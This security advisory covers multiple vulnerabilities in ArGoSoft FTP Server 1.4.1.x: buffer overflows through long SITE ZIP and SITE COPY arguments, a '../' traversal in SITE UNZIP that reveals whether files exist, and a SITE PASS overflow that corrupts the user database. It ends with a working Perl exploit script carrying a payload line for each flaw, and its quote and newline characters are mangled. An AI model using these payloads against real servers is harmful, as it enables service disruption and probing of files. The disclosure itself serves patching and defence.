‘ArGoSoft FTP Server Multiple Vulnerabilities (SITE ZIP, UNZIP, COPY, PASS)’

Summary

‘STORM has discovered multiple security vulnerabilities in ArGoSoft‘s FTP Server:

1) Three allow overflowing an internal buffer – Buffer Overflows

2) One allows discovering whether a file exist on a server (files that reside outside the bound FTP root directory) – File Disclosure

3) Another one allows causing a DoS by overwriting critical parts of the user database file (by the password change mechanism) in such a way that the user database is no longer useable – Denial of Service’

Credit:

‘SecurITeam would like to thank STORM for finding this vulnerability.’


Details

Vulnerable Systems:
 * ArGoSoft version 1.4.1.4 and prior
 * ArGoSoft version 1.4.1.5

Immune Systems:
 * ArGoSoft version 1.4.1.6

Buffer Overflows:
The first two vulnerabilities revolve the use of the SITE ZIP command, the parameters of that command are not checked for their length, causing the program to overflow the internal buffer used by the command. The first one can be caused by sending ‘SITE ZIP Ax512’ (x512 = write the ‘A’ character 512 times), the second one can be caused by sending ‘SITE ZIP storm.zip /f:Ax2048’. The next vulnerability that causes a buffer overflow is caused by using the command ‘SITE COPY’, to recreate this send ‘SITE COPY Ax2048 Ax10’.

File Disclosure:
The file disclosure vulnerability is caused by the ‘SITE UNZIP’ command, the parameter given to the SITE UNZIP command is the file it should unzip, as the file can contain ‘../’ (i.e. it is not filtered), files that reside outside the FTP root directory can be verified for their existence (this is done by comparing the response for ../boot.ini and ../notthere.ini).

Denial of Service:
The denial of service vulnerability is caused by the ‘SITE PASS’ command, this command receives as a second parameter the new password you are interested in using, if you give it a password that is very long, the user database will become corrupt and unusable.

Solution:
Upgrade to the latest version of ArGoSoft FTP Server.

Vendor response:
The vendor was very responsive and quick to fix the issue (within the first 48 hours), the newest version should fix the above vulnerabilities. The new version is available from the vendor’s web site.

Exploit (for all the vulnerabilities):
#!/usr/bin/perl
# Multiple Vulnerabilities in ArGoSoft FTP Server version 1.4 (1.4.1.4)
# Created by Beyond Security Ltd. – All rights reserved.

use IO::Socket;

$host = ‘192.168.1.243’;

$remote = IO::Socket::INET->new ( Proto => ‘tcp’,
     PeerAddr => $host,
     PeerPort => ‘2119’,,
    );

unless ($remote) { die ‘cannot connect to ftp daemon on $host’ }

print ‘connectedn’;
while (<$remote>)
{
 print $_;
 if (/220 /)
 {
  last;
 }
}

$remote->autoflush(1);

my $ftp = ‘USER usernamern’;

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/331 /)
 {
  last;
 }
}

$ftp = join(”, ‘PASS ‘, ‘password’, ‘rn’);
print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/230 /)
 {
  last;
 }
}

#$ftp = join (”, ‘SITE ZIP ‘, ‘A’x512, ‘rn’);
#$ftp = join (”, ‘SITE ZIP storm.zip /f:’, ‘A’x2048, ‘rn’);
#$ftp = join (”, ‘SITE COPY ‘, ‘A’x2048, ‘ ‘, ‘A’x10, ‘rn’);
#$ftp = join (”, ‘SITE UNZIP ‘, ‘../boot.inirn’); # Directory Traversal (we know a certain file exists)
#$ftp = join (”, ‘SITE PASS ‘, ‘storm ‘, ‘A’x3500, ‘rn’); # DoS … against the user database

#Choose one of the above to test the vulnerabilities mentioned

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/250 Done/)
 {
  last;
 }
}

close $remote;’

Categories: Windows